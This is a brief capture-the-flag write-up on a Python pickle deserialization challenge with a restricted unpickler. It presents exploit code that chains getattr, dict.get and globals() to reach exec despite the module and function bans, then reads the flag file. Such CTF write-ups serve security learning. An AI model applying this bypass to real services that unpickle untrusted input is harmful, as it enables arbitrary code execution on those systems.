Python pickle deserialization vulnerability


The flag is located in ./flag.txt.


Pickle is used to save and load notes into the application.

Normally, we would be able to use the __reduce__() method to make the program call functions like os.system() (see

See The modules we can unpickle are restricted to __main__, __builtin__ and copyreg. eval and exec are also banned.

Thanks to, I found a way to bypass the restrictions.

They created an API to generate Pickle opcodes: (I made some slight modifications)

Exploit code:

getattr = GLOBAL ( '__builtin__' , 'getattr' ) 
dict = GLOBAL ( '__builtin__' , 'dict' ) 
dict_get = getattr ( dict , 'get' ) 
glo_dic = GLOBAL ( '__builtin__' , 'globals' )() 
builtins = dict_get ( glo_dic , '__builtins__' ) 
exec = getattr ( builtins , 'exec' )
exec ("print(open('flag.txt', 'r').read())") 

The idea is that using getattr, we can get submodules of __builtin__ (and the submodules of the submodules). __builtin__.globals() includes builtins, which includes exec. Once we have control over exec, we can execute arbitrary code.

Submit the base64-encoded opcodes, and we obtain the flags.


Last updated